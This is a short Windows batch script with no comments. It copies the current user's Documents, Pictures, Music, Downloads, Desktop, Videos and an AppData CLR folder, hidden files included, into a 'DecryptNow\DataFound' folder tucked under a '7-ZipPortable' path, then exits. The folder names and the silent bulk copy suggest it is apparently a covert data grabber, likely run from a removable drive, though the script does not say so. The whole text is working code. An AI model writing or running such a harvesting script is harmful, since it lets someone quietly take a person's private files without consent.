

xcopy C:\Users\%username%\AppData\Roaming\Microsoft\CLR .\7-ZipPortable\ok\DecryptNow /s /e  /h /f /y  /i

xcopy C:\Users\%username%\documents .\7-ZipPortable\ok\DecryptNow\DataFound\Documents /s /e  /h /f /y  /i

xcopy C:\Users\%username%\Pictures .\7-ZipPortable\ok\DecryptNow\DataFound\Pictures /s /e  /h /f /y  /i


xcopy C:\Users\%username%\Music .\7-ZipPortable\ok\DecryptNow\DataFound\Music /s /e  /h /f /y  /i

xcopy C:\Users\%username%\Downloads .\7-ZipPortable\ok\DecryptNow\DataFound\Downloads /s /e  /h /f /y  /i

xcopy C:\Users\%username%\Desktop .\7-ZipPortable\ok\DecryptNow\DataFound\Desktop /s /e  /h /f /y  /i

xcopy C:\Users\%username%\Videos .\7-ZipPortable\ok\DecryptNow\DataFound\Videos /s /e  /h /f /y  /i



exit